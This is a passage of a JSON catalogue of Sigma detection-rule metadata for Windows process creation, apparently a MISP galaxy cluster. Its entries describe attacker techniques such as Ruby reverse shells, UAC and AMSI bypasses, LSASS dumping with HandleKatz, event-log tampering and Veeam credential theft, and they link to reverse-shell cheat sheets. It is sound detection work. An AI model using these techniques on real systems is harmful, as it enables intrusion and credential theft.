script using scrobj.dll from a command in entered into a specially prepared INF file.", "meta": { "author": "frack113", "creation_date": "2021-07-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "value": "InfDefaultInstall.exe .inf Execution" }, { "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_imagingdevices_unusual_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", "value": "ImagingDevices Unusual Parent/Child Processes" }, { "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", "meta": { "author": "Kutepov Anton, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_packet_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": 
"3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", "value": "New Network Trace Capture Started Via Netsh.EXE" }, { "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ruby_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "value": "Ruby Inline Command Execution" }, { "description": "Detects suspicious process related to rasdial.exe", "meta": { "author": "juju4", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rasdial_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/subTee/status/891298217907830785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rasdial_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "value": "Suspicious RASdial Activity" }, { "description": "Detects whether the image specified in a process creation event doesn't refer to an \".exe\" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.\nThis rule might require some initial baselining to align with some third party tooling in the user environment.\n", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-12-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_non_exe_image.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlaboratories.com/2021/12/08/process-ghosting/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "value": "Execution of Suspicious File Type Extension" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "creation_date": "2023-04-18", "falsepositive": [ "Likely with legitimate usage of \".rdp\" files" ], "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { 
"dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "value": "Mstsc.EXE Execution With Local RDP File" }, { "description": "Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)", "creation_date": "2023-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_hidden_dir_index_allocation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/", "https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/", "https://twitter.com/pfiatde/status/1681977680688738305", "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3", "https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0900463c-b33b-49a8-be1d-552a3b553dae", "value": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI" }, { "description": "Detects the execution of clip.exe in order to copy data to the clipboard. 
Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_clip_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", "value": "Data Copied To Clipboard Via Clip.EXE" }, { "description": "Download and compress a remote file and store it in a CAB file on the local machine.", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", "value": "Suspicious Diantz Download and Compress Into a CAB File" }, { "description": "Detects execution of a chromium-based browser in headless mode using the 
\"dump-dom\" command line to download files", "meta": { "author": "Sreeman, Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "value": "File Download with Headless Browser" }, { "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-12-04", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sysmoneop.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml" ], "tags": [ "cve.2022-41120", "attack.t1068", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "value": "HackTool - SysmonEOP Execution" }, { "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load 
using the --agentExtensionPath parameter", "meta": { "author": "bohops", "creation_date": "2022-10-30", "falsepositive": [ "False positives depend on custom use of vsls-agent.exe" ], "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1583916360404729857", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43103702-5886-11ed-9b6a-0242ac120002", "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" }, { "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "236d8e89-ed95-4789-a982-36f4643738ba", "value": "Suspicious Persistence Via VMwareToolBoxCmd.EXE VM 
State Change Script" }, { "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "creation_date": "2019-10-24", "falsepositive": [ "Unknown sub processes of Wsreset.exe" ], "filename": "proc_creation_win_uac_bypass_wsreset.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ReaQta/status/1222548288731217921", "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", "https://www.activecyber.us/activelabs/windows-uac-bypass", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "value": "Bypass UAC via WSReset.exe" }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winzip_password_compression.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, 
"related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" }, { "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the raspberry-robin attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://redcanary.com/blog/raspberry-robin/", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", "value": "Suspicious Usage Of ShellExec_RunDLL" }, { "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", "meta": { "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "creation_date": "2019-10-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_run_script_from_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": 
"f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "value": "Run PowerShell Script from ADS" }, { "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_service_imagepath_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" ], "tags": [ "attack.persistence", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "value": "Changing Existing Service ImagePath Value Via Reg.EXE" }, { "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", 
"refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92a974db-ab84-457f-9ec0-55db83d7a825", "value": "Potential AMSI Bypass Using NULL Bits" }, { "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/orange_8361/status/1518970259868626944", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "value": "UAC Bypass Using Event Viewer RecentViews" }, { "description": "Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2024-03-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_nircmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", 
"https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "264982dc-dbad-4dce-b707-1e0d3e0f73d9", "value": "Renamed NirCmd.EXE Execution" }, { "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" 
}, { "description": "Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpevtmute.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/EvtMute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "value": "HackTool - SharpEvtMute Execution" }, { "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_sys.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_sys.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "value": "Suspicious Rundll32 Activity Invoking Sys File" }, 
{ "description": "Detects AADInternals Cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 that can be abused by threat actors to attack Azure AD or Office 365.", "meta": { "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" ], "tags": [ "attack.execution", "attack.reconnaissance", "attack.discovery", "attack.credential-access", "attack.impact" ] }, "uuid": "c86500e9-a645-4680-98d7-f882c70c1ea3", "value": "AADInternals PowerShell Cmdlets Execution - ProccessCreation" }, { "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of that process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_handlekatz.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/HandleKatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "value": "HackTool - HandleKatz LSASS Dumper Execution" }, { "description": "Detects process execution from a fake recycle bin folder, often used to evade security solutions.", 
"meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_recycle_bin_fake_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "5ce0f04e-3efc-42af-839d-5b3a543b76c0", "value": "Suspicious Process Execution From Fake Recycle.Bin Folder" }, { "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate use to pass password to different powershell commands" ], "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74403157-20f5-415d-89a7-c505779585cf", "value": "ConvertTo-SecureString Cmdlet Usage Via CommandLine" }, { "description": "Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlcmd_veeam_db_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "696bfb54-227e-4602-ac5b-30d9d2053312", "value": "Veeam Backup Database Suspicious Query" }, { "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dns_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ 
